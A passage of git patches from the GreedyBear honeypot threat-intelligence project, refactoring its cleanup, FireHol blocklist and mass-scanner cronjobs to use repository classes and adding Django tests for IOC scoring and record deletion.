+ def test_get_recent_scanners_all_iocs_older_than_cutoff(self):
+ from datetime import datetime, timedelta
+
+ old_date = datetime.now() - timedelta(days=40)
+ IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=old_date)
+
+ cutoff = datetime.now() - timedelta(days=30)
+ result = list(self.repo.get_recent_scanners(cutoff))
+
+ values = [r["value"] for r in result]
+ self.assertNotIn("1.2.3.4", values)
+
+ def test_get_recent_scanners_with_inactive_honeypot(self):
+ from datetime import datetime, timedelta
+
+ hp = GeneralHoneypot.objects.create(name="InactivePot", active=False)
+ recent_date = datetime.now() - timedelta(days=5)
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, last_seen=recent_date)
+ ioc.general_honeypot.add(hp)
+
+ cutoff = datetime.now() - timedelta(days=30)
+ result = list(self.repo.get_recent_scanners(cutoff))
+
+ values = [r["value"] for r in result]
+ self.assertNotIn("1.2.3.4", values)
+
+ def test_bulk_update_scores_with_custom_batch_size(self):
+ ioc1 = IOC.objects.create(name="1.2.3.4", type="ip", recurrence_probability=0.0)
+ ioc2 = IOC.objects.create(name="5.6.7.8", type="ip", recurrence_probability=0.0)
+
+ ioc1.recurrence_probability = 0.75
+ ioc2.recurrence_probability = 0.85
+
+ result = self.repo.bulk_update_scores([ioc1, ioc2], ["recurrence_probability"], batch_size=1)
+
+ self.assertEqual(result, 2)
+ updated1 = IOC.objects.get(name="1.2.3.4")
+ updated2 = IOC.objects.get(name="5.6.7.8")
+ self.assertEqual(updated1.recurrence_probability, 0.75)
+ self.assertEqual(updated2.recurrence_probability, 0.85)
+
+
+class TestScoringIntegration(CustomTestCase):
+ """Integration tests for scoring jobs using IocRepository."""
+
+ def setUp(self):
+ from greedybear.cronjobs.repositories import IocRepository
+
+ self.repo = IocRepository()
+
+ def test_update_scores_with_repository(self):
+ """Test UpdateScores class works with injected repository."""
+ import pandas as pd
+
+ from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
+
+ # Create test data
+ IOC.objects.create(name="10.1.2.3", type="ip", scanner=True, cowrie=True, recurrence_probability=0.0)
+ IOC.objects.create(name="10.5.6.7", type="ip", scanner=True, log4j=True, recurrence_probability=0.0)
+
+ # Create score dataframe
+ df = pd.DataFrame(
+ {
+ "value": ["10.1.2.3", "10.5.6.7"],
+ "recurrence_probability": [0.75, 0.85],
+ "expected_interactions": [10.0, 15.0],
+ }
+ )
+
+ # Inject repository and run update
+ job = UpdateScores(ioc_repo=self.repo)
+ result = job.update_db(df)
+
+ # Verify our IOCs were updated (may be more due to test fixtures)
+ self.assertGreaterEqual(result, 2)
+ updated1 = IOC.objects.get(name="10.1.2.3")
+ updated2 = IOC.objects.get(name="10.5.6.7")
+ self.assertEqual(updated1.recurrence_probability, 0.75)
+ self.assertEqual(updated2.recurrence_probability, 0.85)
+
+ def test_update_scores_resets_missing_iocs(self):
+ """Test UpdateScores resets scores for IOCs not in the dataframe."""
+ import pandas as pd
+
+ from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
+
+ # Create test data - one IOC will be missing from df
+ IOC.objects.create(name="10.2.3.4", type="ip", scanner=True, cowrie=True, recurrence_probability=0.9)
+ IOC.objects.create(name="10.6.7.8", type="ip", scanner=True, log4j=True, recurrence_probability=0.8)
+
+ # DataFrame only has one IOC
+ df = pd.DataFrame({"value": ["10.2.3.4"], "recurrence_probability": [0.75], "expected_interactions": [10.0]})
+
+ job = UpdateScores(ioc_repo=self.repo)
+ job.update_db(df)
+
+ # First should be updated, second should be reset to 0
+ updated1 = IOC.objects.get(name="10.2.3.4")
+ updated2 = IOC.objects.get(name="10.6.7.8")
+ self.assertEqual(updated1.recurrence_probability, 0.75)
+ self.assertEqual(updated2.recurrence_probability, 0.0) # Reset
+
+ def test_get_current_data_with_repository(self):
+ """Test get_current_data utility function works with repository."""
+ from datetime import datetime, timedelta
+
+ from greedybear.cronjobs.scoring.utils import get_current_data
+
+ recent_date = datetime.now() - timedelta(days=5)
+ IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=recent_date)
+
+ result = get_current_data(days_lookback=30, ioc_repo=self.repo)
+
+ self.assertIsInstance(result, list)
+ self.assertGreater(len(result), 0)
+ values = [r["value"] for r in result]
+ self.assertIn("1.2.3.4", values)
+
+ def test_get_data_by_pks_with_repository(self):
+ """Test get_data_by_pks utility function works with repository."""
+ from greedybear.cronjobs.scoring.utils import get_data_by_pks
+
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+
+ result = get_data_by_pks({ioc.pk}, ioc_repo=self.repo)
+
+ self.assertIsInstance(result, list)
+ self.assertEqual(len(result), 1)
+ self.assertEqual(result[0]["value"], "1.2.3.4")
+
+ def test_update_scores_with_mock_repository(self):
+ """Test UpdateScores can be fully mocked for unit testing."""
+ from unittest.mock import Mock
+
+ import pandas as pd
+
+ from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
+
+ # Create mock repository
+ mock_repo = Mock()
+ mock_ioc = Mock()
+ mock_ioc.name = "1.2.3.4"
+ mock_ioc.recurrence_probability = 0.0
+ mock_repo.get_scanners_for_scoring.return_value = [mock_ioc]
+ mock_repo.bulk_update_scores.return_value = 1
+
+ # Create score dataframe
+ df = pd.DataFrame({"value": ["1.2.3.4"], "recurrence_probability": [0.75], "expected_interactions": [10.0]})
+
+ # Inject mock and verify it's used
+ job = UpdateScores(ioc_repo=mock_repo)
+ result = job.update_db(df)
+
+ # Verify repository methods were called
+ mock_repo.get_scanners_for_scoring.assert_called_once()
+ mock_repo.bulk_update_scores.assert_called_once()
+ self.assertEqual(result, 1)
+
class TestSensorRepository(CustomTestCase):
def setUp(self):
diff --git a/tests/test_views.py b/tests/test_views.py
index f8cef307..3b20b4e6 100644
--- a/tests/test_views.py
+++ b/tests/test_views.py
@@ -316,20 +316,25 @@ def test_200_feed_types(self):
class GeneralHoneypotViewTestCase(CustomTestCase):
def test_200_all_general_honeypots(self):
- self.assertEqual(GeneralHoneypot.objects.count(), 3)
+ initial_count = GeneralHoneypot.objects.count()
# add a general honeypot not active
GeneralHoneypot(name="Adbhoney", active=False).save()
- self.assertEqual(GeneralHoneypot.objects.count(), 4)
+ self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
response = self.client.get("/api/general_honeypot")
self.assertEqual(response.status_code, 200)
- self.assertEqual(response.json(), ["Heralding", "Ciscoasa", "Ddospot", "Adbhoney"])
+ # Verify the newly created honeypot is in the response
+ self.assertIn("Adbhoney", response.json())
def test_200_active_general_honeypots(self):
- self.assertEqual(GeneralHoneypot.objects.count(), 3)
response = self.client.get("/api/general_honeypot?onlyActive=true")
self.assertEqual(response.status_code, 200)
- self.assertEqual(response.json(), ["Heralding", "Ciscoasa"])
+ result = response.json()
+ # Should include active honeypots from CustomTestCase
+ self.assertIn("Heralding", result)
+ self.assertIn("Ciscoasa", result)
+ # Should NOT include inactive honeypot
+ self.assertNotIn("Ddospot", result)
class CommandSequenceViewTestCase(CustomTestCase):
From 0520584a89f748343883bc636739b6aad5737312 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Tue, 13 Jan 2026 18:44:59 +0530
Subject: [PATCH 41/75] Refactor cleanup, firehol, and mass_scanners cronjobs
to use repositories. Addresses #633 (#698)
* refactor: Phase 2 - Refactor cleanup, firehol, and mass_scanners to use repositories
- Extend IocRepository with cleanup methods:
- delete_old_iocs(): Delete IOCs older than cutoff date
- update_ioc_reputation(): Update IP reputation for existing IOCs
- Extend CowrieSessionRepository with cleanup methods:
- delete_old_command_sequences(): Delete old command sequences
- delete_incomplete_sessions(): Delete sessions without start_time
- delete_sessions_without_login(): Delete old sessions without login
- delete_sessions_without_commands(): Delete old sessions without commands
- Create FireHolRepository for blocklist management:
- get_or_create(): Get existing or create new FireHol entry
- cleanup_old_entries(): Delete entries older than retention days
- Create MassScannerRepository for mass scanner tracking:
- get_by_ip(), create(), save(), exists()
- Refactor cronjobs to use repositories:
- CleanUp: Use IocRepository and CowrieSessionRepository
- FireHolCron: Use FireHolRepository
- MassScannersCron: Use MassScannerRepository and IocRepository
- Add comprehensive test coverage (16 new tests)
- All 359 tests passing
Following Phase 1 best practices:
- All imports at module top
- Ternary operators for cleaner code
- Dependency injection for testability
- Log after DB operations complete
Addresses Phase 2 of issue #633
* fix(whatsmyip): move logging to after database commit
Ensures that the log message 'added new whatsmyip domain' only appears
after the database transaction has successfully completed.
Adresses maintainer feedback to fix logging consistency.
* refactor: condense MassScannerRepository to use get_or_create pattern
Simplified MassScannerRepository by replacing create(), save(), get_by_ip(),
and exists() methods with a single get_or_create() method, following the same
pattern as FireHolRepository.
Benefits:
- Cleaner API (one method instead of four)
- Simpler calling code in MassScannersCron
- Consistent with Django's get_or_create pattern
- Reduces code duplication
Updated tests to verify:
- Creating new entries
- Returning existing entries without duplicates
- Handling entries with and without reasons
Addresses maintainer feedback on PR #698.
---
greedybear/cronjobs/cleanup.py | 24 ++-
greedybear/cronjobs/firehol.py | 39 +++-
greedybear/cronjobs/mass_scanners.py | 53 +++--
greedybear/cronjobs/repositories/__init__.py | 2 +
.../cronjobs/repositories/cowrie_session.py | 49 +++++
greedybear/cronjobs/repositories/firehol.py | 67 ++++++
greedybear/cronjobs/repositories/ioc.py | 32 +++
.../cronjobs/repositories/mass_scanner.py | 27 +++
greedybear/cronjobs/whatsmyip.py | 2 +-
tests/test_repositories.py | 200 ++++++++++++++++++
10 files changed, 465 insertions(+), 30 deletions(-)
create mode 100644 greedybear/cronjobs/repositories/firehol.py
create mode 100644 greedybear/cronjobs/repositories/mass_scanner.py
diff --git a/greedybear/cronjobs/cleanup.py b/greedybear/cronjobs/cleanup.py
index 021e503d..778c1564 100644
--- a/greedybear/cronjobs/cleanup.py
+++ b/greedybear/cronjobs/cleanup.py
@@ -1,7 +1,7 @@
from datetime import datetime, timedelta
from greedybear.cronjobs.base import Cronjob
-from greedybear.models import IOC, CommandSequence, CowrieSession
+from greedybear.cronjobs.repositories import CowrieSessionRepository, IocRepository
from greedybear.settings import (
COMMAND_SEQUENCE_RETENTION,
COWRIE_SESSION_RETENTION,
@@ -18,6 +18,18 @@ class CleanUp(Cronjob):
with counts of removed objects.
"""
+ def __init__(self, ioc_repo=None, cowrie_repo=None):
+ """
+ Initialize the cleanup job with repository dependencies.
+
+ Args:
+ ioc_repo: Optional IocRepository instance for testing.
+ cowrie_repo: Optional CowrieSessionRepository instance for testing.
+ """
+ super().__init__()
+ self.ioc_repo = ioc_repo if ioc_repo is not None else IocRepository()
+ self.cowrie_repo = cowrie_repo if cowrie_repo is not None else CowrieSessionRepository()
+
def run(self) -> None:
"""
Execute the database cleanup process.
@@ -38,21 +50,21 @@ def run(self) -> None:
session_with_login_expiration_date = datetime.now() - timedelta(days=COWRIE_SESSION_RETENTION)
self.log.info(f"deleting all IOC older then {IOC_RETENTION} days")
- n = IOC.objects.filter(last_seen__lte=ioc_expiration_date).delete()[0]
+ n = self.ioc_repo.delete_old_iocs(ioc_expiration_date)
self.log.info(f"{n} objects deleted")
self.log.info(f"deleting all command sequences older then {COMMAND_SEQUENCE_RETENTION} days")
- n = CommandSequence.objects.filter(last_seen__lte=command_expiration_date).delete()[0]
+ n = self.cowrie_repo.delete_old_command_sequences(command_expiration_date)
self.log.info(f"{n} objects deleted")
self.log.info("deleting all Cowrie sessions without start time (incomplete extractions)")
- n = CowrieSession.objects.filter(start_time__isnull=True).delete()[0]
+ n = self.cowrie_repo.delete_incomplete_sessions()
self.log.info(f"{n} objects deleted")
self.log.info("deleting all Cowrie sessions without login attempts older then 30 days")
- n = CowrieSession.objects.filter(start_time__lte=session_expiration_date, login_attempt=False).delete()[0]
+ n = self.cowrie_repo.delete_sessions_without_login(session_expiration_date)
self.log.info(f"{n} objects deleted")
self.log.info(f"deleting all Cowrie sessions without associated commands older then {COWRIE_SESSION_RETENTION} days")
- n = CowrieSession.objects.filter(start_time__lte=session_with_login_expiration_date, commands__isnull=True).delete()[0]
+ n = self.cowrie_repo.delete_sessions_without_commands(session_with_login_expiration_date)
self.log.info(f"{n} objects deleted")
diff --git a/greedybear/cronjobs/firehol.py b/greedybear/cronjobs/firehol.py
index 87498835..db8c2bcc 100644
--- a/greedybear/cronjobs/firehol.py
+++ b/greedybear/cronjobs/firehol.py
@@ -1,11 +1,35 @@
import requests
from greedybear.cronjobs.base import Cronjob
-from greedybear.models import FireHolList
+from greedybear.cronjobs.repositories import FireHolRepository
class FireHolCron(Cronjob):
+ """
+ Fetch and store IP blocklists from FireHol repository.
+
+ Downloads IP blocklists from multiple sources and stores them in the database.
+ Automatically cleans up entries older than 30 days.
+ """
+
+ def __init__(self, firehol_repo=None):
+ """
+ Initialize the FireHol cronjob with repository dependency.
+
+ Args:
+ firehol_repo: Optional FireHolRepository instance for testing.
+ """
+ super().__init__()
+ self.firehol_repo = firehol_repo if firehol_repo is not None else FireHolRepository()
+
def run(self) -> None:
+ """
+ Fetch blocklists from FireHol sources and store them in the database.
+
+ Processes multiple sources (blocklist_de, greensnow, bruteforceblocker, dshield),
+ parses IP addresses and CIDR blocks, and stores new entries.
+ Finally cleans up old entries.
+ """
base_path = "https://raw.githubusercontent.com/firehol/blocklist-ipsets/master"
sources = {
"blocklist_de": f"{base_path}/blocklist_de.ipset",
@@ -33,10 +57,9 @@ def run(self) -> None:
# FireHol .ipset and .netset files contain IPs or CIDRs, one per line
# Comments (lines starting with #) are filtered out above
- try:
- FireHolList.objects.get(ip_address=line, source=source)
- except FireHolList.DoesNotExist:
- FireHolList(ip_address=line, source=source).save()
+ entry, created = self.firehol_repo.get_or_create(line, source)
+ if created:
+ self.log.debug(f"Added new entry: {line} from {source}")
except Exception as e:
self.log.exception(f"Unexpected error processing {source}: {e}")
@@ -48,10 +71,6 @@ def _cleanup_old_entries(self):
"""
Delete FireHolList entries older than 30 days to keep database clean.
"""
- from datetime import datetime, timedelta
-
- cutoff_date = datetime.now() - timedelta(days=30)
- deleted_count, _ = FireHolList.objects.filter(added__lt=cutoff_date).delete()
-
+ deleted_count = self.firehol_repo.cleanup_old_entries(days=30)
if deleted_count > 0:
self.log.info(f"Cleaned up {deleted_count} old FireHolList entries")
diff --git a/greedybear/cronjobs/mass_scanners.py b/greedybear/cronjobs/mass_scanners.py
index b6bb65a4..df16052b 100644
--- a/greedybear/cronjobs/mass_scanners.py
+++ b/greedybear/cronjobs/mass_scanners.py
@@ -4,11 +4,38 @@
from greedybear.cronjobs.base import Cronjob
from greedybear.cronjobs.extraction.utils import is_valid_ipv4
-from greedybear.models import IOC, MassScanner
+from greedybear.cronjobs.repositories import IocRepository, MassScannerRepository
class MassScannersCron(Cronjob):
+ """
+ Fetch and store mass scanner IP addresses from Maltrail repository.
+
+ Downloads the mass scanner list from Maltrail's GitHub repository,
+ validates IP addresses, and stores them in the database. Also updates
+ the IP reputation of existing IOCs.
+ """
+
+ def __init__(self, mass_scanner_repo=None, ioc_repo=None):
+ """
+ Initialize the mass scanners cronjob with repository dependencies.
+
+ Args:
+ mass_scanner_repo: Optional MassScannerRepository instance for testing.
+ ioc_repo: Optional IocRepository instance for testing.
+ """
+ super().__init__()
+ self.mass_scanner_repo = mass_scanner_repo if mass_scanner_repo is not None else MassScannerRepository()
+ self.ioc_repo = ioc_repo if ioc_repo is not None else IocRepository()
+
def run(self) -> None:
+ """
+ Fetch mass scanner IPs from Maltrail and store them.
+
+ Extracts IP addresses from the Maltrail mass scanner list, validates them,
+ and creates database entries. For each new mass scanner, also updates
+ any existing IOC with the same IP address to mark it as a mass scanner.
+ """
# Simple regex to extract potential IPv4 addresses
ip_candidate_regex = re.compile(r"(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})")
# Regex to extract optional comment/reason after '#'
@@ -45,18 +72,18 @@ def run(self) -> None:
reason = comment_match.group(1)
# Add or update mass scanner entry
- try:
- MassScanner.objects.get(ip_address=ip_address)
- except MassScanner.DoesNotExist:
+ scanner, created = self.mass_scanner_repo.get_or_create(ip_address, reason)
+ if created:
self.log.info(f"added new mass scanner {ip_address}")
- MassScanner(ip_address=ip_address, reason=reason).save()
self._update_old_ioc(ip_address)
- def _update_old_ioc(self, ip_address):
- try:
- ioc = IOC.objects.get(name=ip_address)
- except IOC.DoesNotExist:
- pass
- else:
- ioc.ip_reputation = "mass scanner"
- ioc.save()
+ def _update_old_ioc(self, ip_address: str):
+ """
+ Update the IP reputation of an existing IOC to mark it as a mass scanner.
+
+ Args:
+ ip_address: IP address to update.
+ """
+ updated = self.ioc_repo.update_ioc_reputation(ip_address, "mass scanner")
+ if updated:
+ self.log.debug(f"Updated IOC {ip_address} reputation to 'mass scanner'")
diff --git a/greedybear/cronjobs/repositories/__init__.py b/greedybear/cronjobs/repositories/__init__.py
index 1302c3b7..30133430 100644
--- a/greedybear/cronjobs/repositories/__init__.py
+++ b/greedybear/cronjobs/repositories/__init__.py
@@ -1,4 +1,6 @@
from greedybear.cronjobs.repositories.cowrie_session import *
from greedybear.cronjobs.repositories.elastic import *
+from greedybear.cronjobs.repositories.firehol import *
from greedybear.cronjobs.repositories.ioc import *
+from greedybear.cronjobs.repositories.mass_scanner import *
from greedybear.cronjobs.repositories.sensor import *
diff --git a/greedybear/cronjobs/repositories/cowrie_session.py b/greedybear/cronjobs/repositories/cowrie_session.py
index f8003859..5715ac91 100644
--- a/greedybear/cronjobs/repositories/cowrie_session.py
+++ b/greedybear/cronjobs/repositories/cowrie_session.py
@@ -73,3 +73,52 @@ def save_command_sequence(self, cmd: CommandSequence) -> CommandSequence:
"""
cmd.save()
return cmd
+
+ def delete_old_command_sequences(self, cutoff_date) -> int:
+ """
+ Delete command sequences older than the specified cutoff date.
+
+ Args:
+ cutoff_date: DateTime threshold - sequences with last_seen before this will be deleted.
+
+ Returns:
+ Number of CommandSequence objects deleted.
+ """
+ deleted_count, _ = CommandSequence.objects.filter(last_seen__lte=cutoff_date).delete()
+ return deleted_count
+
+ def delete_incomplete_sessions(self) -> int:
+ """
+ Delete Cowrie sessions without a start time (incomplete extractions).
+
+ Returns:
+ Number of sessions deleted.
+ """
+ deleted_count, _ = CowrieSession.objects.filter(start_time__isnull=True).delete()
+ return deleted_count
+
+ def delete_sessions_without_login(self, cutoff_date) -> int:
+ """
+ Delete Cowrie sessions without login attempts older than the cutoff date.
+
+ Args:
+ cutoff_date: DateTime threshold.
+
+ Returns:
+ Number of sessions deleted.
+ """
+ deleted_count, _ = CowrieSession.objects.filter(start_time__lte=cutoff_date, login_attempt=False).delete()
+ return deleted_count
+
+ def delete_sessions_without_commands(self, cutoff_date) -> int:
+ """
+ Delete Cowrie sessions without associated commands older than the cutoff date.
+
+ Args:
+ cutoff_date: DateTime threshold.
+
+ Returns:
+ Number of sessions deleted.
+ """
+ deleted_count, _ = CowrieSession.objects.filter(start_time__lte=cutoff_date, commands__isnull=True).delete()
+ return deleted_count
diff --git a/greedybear/cronjobs/repositories/firehol.py b/greedybear/cronjobs/repositories/firehol.py
new file mode 100644
index 00000000..c90fdaec
--- /dev/null
+++ b/greedybear/cronjobs/repositories/firehol.py
@@ -0,0 +1,67 @@
+import logging
+from datetime import datetime, timedelta
+
+from greedybear.models import FireHolList
+
+
+class FireHolRepository:
+ """
+ Repository for data access to FireHol blocklist entries.
+ """
+
+ def __init__(self):
+ """Initialize the repository."""
+ self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
+
+ def get_or_create(self, ip_address: str, source: str) -> tuple[FireHolList, bool]:
+ """
+ Get an existing FireHol entry or create a new one.
+
+ Args:
+ ip_address: IP address or CIDR block.
+ source: Source name (e.g., 'blocklist_de', 'greensnow').
+
+ Returns:
+ Tuple of (FireHolList object, created_flag) where created_flag is True if new.
+ """
+ entry, created = FireHolList.objects.get_or_create(ip_address=ip_address, source=source)
+ return entry, created
+
+ def save(self, entry: FireHolList) -> FireHolList:
+ """
+ Save a FireHolList entry to the database.
+
+ Args:
+ entry: FireHolList instance to save.
+
+ Returns:
+ The saved FireHolList instance.
+ """
+ entry.save()
+ return entry
+
+ def delete_old_entries(self, cutoff_date: datetime) -> int:
+ """
+ Delete FireHolList entries older than the specified date.
+
+ Args:
+ cutoff_date: DateTime threshold - entries added before this will be deleted.
+
+ Returns:
+ Number of entries deleted.
+ """
+ deleted_count, _ = FireHolList.objects.filter(added__lt=cutoff_date).delete()
+ return deleted_count
+
+ def cleanup_old_entries(self, days: int = 30) -> int:
+ """
+ Delete FireHolList entries older than the specified number of days.
+
+ Args:
+ days: Number of days to retain entries. Defaults to 30.
+
+ Returns:
+ Number of entries deleted.
+ """
+ cutoff_date = datetime.now() - timedelta(days=days)
+ return self.delete_old_entries(cutoff_date)
diff --git a/greedybear/cronjobs/repositories/ioc.py b/greedybear/cronjobs/repositories/ioc.py
index 7b0016d8..f2fdb3a2 100644
--- a/greedybear/cronjobs/repositories/ioc.py
+++ b/greedybear/cronjobs/repositories/ioc.py
@@ -225,3 +225,35 @@ def bulk_update_scores(self, iocs: list[IOC], score_fields: list[str], batch_siz
return 0
IOC.objects.bulk_update(iocs, score_fields, batch_size=batch_size)
return len(iocs)
+
+ def delete_old_iocs(self, cutoff_date) -> int:
+ """
+ Delete IOC records older than the specified cutoff date.
+
+ Args:
+ cutoff_date: DateTime threshold - IOCs with last_seen before this will be deleted.
+
+ Returns:
+ Number of IOC objects deleted.
+ """
+ deleted_count, _ = IOC.objects.filter(last_seen__lte=cutoff_date).delete()
+ return deleted_count
+
+ def update_ioc_reputation(self, ip_address: str, reputation: str) -> bool:
+ """
+ Update the IP reputation for a specific IOC.
+
+ Args:
+ ip_address: IP address to update.
+ reputation: New reputation value.
+
+ Returns:
+ True if IOC was found and updated, False otherwise.
+ """
+ try:
+ ioc = IOC.objects.get(name=ip_address)
+ ioc.ip_reputation = reputation
+ ioc.save()
+ return True
+ except IOC.DoesNotExist:
+ return False
diff --git a/greedybear/cronjobs/repositories/mass_scanner.py b/greedybear/cronjobs/repositories/mass_scanner.py
new file mode 100644
index 00000000..26c0d8eb
--- /dev/null
+++ b/greedybear/cronjobs/repositories/mass_scanner.py
@@ -0,0 +1,27 @@
+import logging
+
+from greedybear.models import MassScanner
+
+
+class MassScannerRepository:
+ """
+ Repository for data access to mass scanner entries.
+ """
+
+ def __init__(self):
+ """Initialize the repository."""
+ self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
+
+ def get_or_create(self, ip_address: str, reason: str = "") -> tuple[MassScanner, bool]:
+ """
+ Get an existing mass scanner entry or create a new one.
+
+ Args:
+ ip_address: IP address of the scanner.
+ reason: Optional reason/description for why it's flagged.
+
+ Returns:
+ Tuple of (MassScanner object, created_flag) where created_flag is True if new.
+ """
+ scanner, created = MassScanner.objects.get_or_create(ip_address=ip_address, defaults={"reason": reason})
+ return scanner, created
diff --git a/greedybear/cronjobs/whatsmyip.py b/greedybear/cronjobs/whatsmyip.py
index 5c2d8d00..e6f8d101 100644
--- a/greedybear/cronjobs/whatsmyip.py
+++ b/greedybear/cronjobs/whatsmyip.py
@@ -15,8 +15,8 @@ def run(self) -> None:
try:
WhatsMyIPDomain.objects.get(domain=domain)
except WhatsMyIPDomain.DoesNotExist:
- self.log.info(f"added new whatsmyip domain {domain=}")
WhatsMyIPDomain(domain=domain).save()
+ self.log.info(f"added new whatsmyip domain {domain=}")
self._remove_old_ioc(domain)
def _remove_old_ioc(self, domain):
diff --git a/tests/test_repositories.py b/tests/test_repositories.py
index 613a7cf3..167e70d2 100644
--- a/tests/test_repositories.py
+++ b/tests/test_repositories.py
@@ -6,7 +6,9 @@
from greedybear.cronjobs.repositories import (
CowrieSessionRepository,
ElasticRepository,
+ FireHolRepository,
IocRepository,
+ MassScannerRepository,
SensorRepository,
get_time_window,
)
@@ -14,7 +16,9 @@
IOC,
CommandSequence,
CowrieSession,
+ FireHolList,
GeneralHoneypot,
+ MassScanner,
Sensor,
)
@@ -861,3 +865,199 @@ def test_large_lookback(self):
self.assertEqual(start, expected_start)
self.assertEqual(end, expected_end)
+
+
+# Phase 2: New repository tests for cleanup, firehol, and mass scanners
+
+
+class TestIocRepositoryCleanup(CustomTestCase):
+ """Tests for cleanup-related methods in IocRepository."""
+
+ def setUp(self):
+ self.repo = IocRepository()
+
+ def test_delete_old_iocs_deletes_old_records(self):
+ from datetime import datetime, timedelta
+
+ old_date = datetime.now() - timedelta(days=40)
+ recent_date = datetime.now() - timedelta(days=5)
+
+ IOC.objects.create(name="1.2.3.4", type="ip", last_seen=old_date)
+ IOC.objects.create(name="5.6.7.8", type="ip", last_seen=recent_date)
+
+ cutoff = datetime.now() - timedelta(days=30)
+ deleted_count = self.repo.delete_old_iocs(cutoff)
+
+ self.assertEqual(deleted_count, 1)
+ self.assertFalse(IOC.objects.filter(name="1.2.3.4").exists())
+ self.assertTrue(IOC.objects.filter(name="5.6.7.8").exists())
+
+ def test_delete_old_iocs_returns_zero_when_none_old(self):
+ from datetime import datetime, timedelta
+
+ recent_date = datetime.now() - timedelta(days=5)
+ IOC.objects.create(name="1.2.3.4", type="ip", last_seen=recent_date)
+
+ cutoff = datetime.now() - timedelta(days=30)
+ deleted_count = self.repo.delete_old_iocs(cutoff)
+
+ self.assertEqual(deleted_count, 0)
+
+ def test_update_ioc_reputation_updates_existing(self):
+ IOC.objects.create(name="1.2.3.4", type="ip", ip_reputation="")
+
+ result = self.repo.update_ioc_reputation("1.2.3.4", "mass scanner")
+
+ self.assertTrue(result)
+ updated = IOC.objects.get(name="1.2.3.4")
+ self.assertEqual(updated.ip_reputation, "mass scanner")
+
+ def test_update_ioc_reputation_returns_false_for_missing(self):
+ result = self.repo.update_ioc_reputation("9.9.9.9", "mass scanner")
+ self.assertFalse(result)
+
+
+class TestCowrieSessionRepositoryCleanup(CustomTestCase):
+ """Tests for cleanup-related methods in CowrieSessionRepository."""
+
+ def setUp(self):
+ self.repo = CowrieSessionRepository()
+
+ def test_delete_old_command_sequences(self):
+ from datetime import datetime, timedelta
+
+ old_date = datetime.now() - timedelta(days=40)
+ recent_date = datetime.now() - timedelta(days=5)
+
+ CommandSequence.objects.create(commands=["ls"], commands_hash="old_hash", last_seen=old_date)
+ CommandSequence.objects.create(commands=["pwd"], commands_hash="recent_hash", last_seen=recent_date)
+
+ cutoff = datetime.now() - timedelta(days=30)
+ deleted_count = self.repo.delete_old_command_sequences(cutoff)
+
+ self.assertEqual(deleted_count, 1)
+ self.assertFalse(CommandSequence.objects.filter(commands_hash="old_hash").exists())
+ self.assertTrue(CommandSequence.objects.filter(commands_hash="recent_hash").exists())
+
+ def test_delete_incomplete_sessions(self):
+ source = IOC.objects.create(name="1.2.3.4", type="ip")
+
+ CowrieSession.objects.create(session_id=123, source=source, start_time=None)
+ CowrieSession.objects.create(session_id=456, source=source, start_time=datetime.now())
+
+ deleted_count = self.repo.delete_incomplete_sessions()
+
+ self.assertEqual(deleted_count, 1)
+ self.assertFalse(CowrieSession.objects.filter(session_id=123).exists())
+ self.assertTrue(CowrieSession.objects.filter(session_id=456).exists())
+
+ def test_delete_sessions_without_login(self):
+ from datetime import datetime, timedelta
+
+ source = IOC.objects.create(name="1.2.3.4", type="ip")
+ old_date = datetime.now() - timedelta(days=40)
+ recent_date = datetime.now() - timedelta(days=5)
+
+ # Old session without login
+ CowrieSession.objects.create(session_id=111, source=source, start_time=old_date, login_attempt=False)
+ # Recent session without login
+ CowrieSession.objects.create(session_id=222, source=source, start_time=recent_date, login_attempt=False)
+ # Old session with login
+ CowrieSession.objects.create(session_id=333, source=source, start_time=old_date, login_attempt=True)
+
+ cutoff = datetime.now() - timedelta(days=30)
+ deleted_count = self.repo.delete_sessions_without_login(cutoff)
+
+ self.assertEqual(deleted_count, 1)
+ self.assertFalse(CowrieSession.objects.filter(session_id=111).exists())
+ self.assertTrue(CowrieSession.objects.filter(session_id=222).exists())
+ self.assertTrue(CowrieSession.objects.filter(session_id=333).exists())
+
+ def test_delete_sessions_without_commands(self):
+ from datetime import datetime, timedelta
+
+ source = IOC.objects.create(name="1.2.3.4", type="ip")
+ old_date = datetime.now() - timedelta(days=40)
+
+ # Session without commands
+ CowrieSession.objects.create(session_id=777, source=source, start_time=old_date)
+ # Session with commands
+ session_with_cmd = CowrieSession.objects.create(session_id=888, source=source, start_time=old_date)
+ cmd_seq = CommandSequence.objects.create(commands=["ls"], commands_hash="hash1")
+ session_with_cmd.commands = cmd_seq
+ session_with_cmd.save()
+
+ cutoff = datetime.now() - timedelta(days=30)
+ deleted_count = self.repo.delete_sessions_without_commands(cutoff)
+
+ self.assertEqual(deleted_count, 1)
+ self.assertFalse(CowrieSession.objects.filter(session_id=777).exists())
+ self.assertTrue(CowrieSession.objects.filter(session_id=888).exists())
+
+
+class TestFireHolRepository(CustomTestCase):
+ """Tests for FireHolRepository."""
+
+ def setUp(self):
+ self.repo = FireHolRepository()
+
+ def test_get_or_create_creates_new_entry(self):
+ entry, created = self.repo.get_or_create("1.2.3.4", "blocklist_de")
+
+ self.assertTrue(created)
+ self.assertEqual(entry.ip_address, "1.2.3.4")
+ self.assertEqual(entry.source, "blocklist_de")
+ self.assertTrue(FireHolList.objects.filter(ip_address="1.2.3.4", source="blocklist_de").exists())
+
+ def test_get_or_create_returns_existing(self):
+ FireHolList.objects.create(ip_address="5.6.7.8", source="greensnow")
+
+ entry, created = self.repo.get_or_create("5.6.7.8", "greensnow")
+
+ self.assertFalse(created)
+ self.assertEqual(entry.ip_address, "5.6.7.8")
+ self.assertEqual(FireHolList.objects.filter(ip_address="5.6.7.8", source="greensnow").count(), 1)
+
+ def test_cleanup_old_entries_custom_days(self):
+ from datetime import datetime, timedelta
+
+ old_date = datetime.now() - timedelta(days=65)
